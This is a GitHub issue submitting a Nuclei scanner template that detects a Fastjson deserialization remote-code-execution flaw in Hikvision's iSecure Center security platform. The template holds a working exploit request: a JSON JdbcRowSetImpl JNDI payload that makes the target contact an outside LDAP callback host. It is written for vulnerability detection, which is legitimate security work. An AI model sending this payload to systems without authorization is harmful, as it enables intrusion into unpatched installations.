### ISSUE TITLE
hikvision-isecure-center-fastjson-rce

### ISSUE THREAD

**Issue by SleepingBag945** [projectdiscovery/nuclei-templates#7982]
### Template Information:

hikvision-isecure-center-fastjson-rce
app="HIKVISION-iSecure-Center"

### Nuclei Template:

```yaml
id: hikvision-isecure-center-fastjson-rce

info:
  name: 海康威视综合安防管理平台 Fastjson RCE
  author: SleepingBag945
  severity: critical
  description: |
    海康威视综合安防管理平台 Fastjson RCE
  tags: fastjson,rce,hikvision

http:
  - raw:
      - |
        POST /bic/ssoService/v1/applyCT HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
        Accept-Encoding: gzip, deflate
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Host: {{Hostname}}
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Dnt: 1
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: cross-site
        Sec-Fetch-User: ?1
        Te: trailers
        Content-Type: application/json

        {"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://{{interactsh-url}}","autoCommit":true},"hfe4zyyzldp":"="}



    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"
```
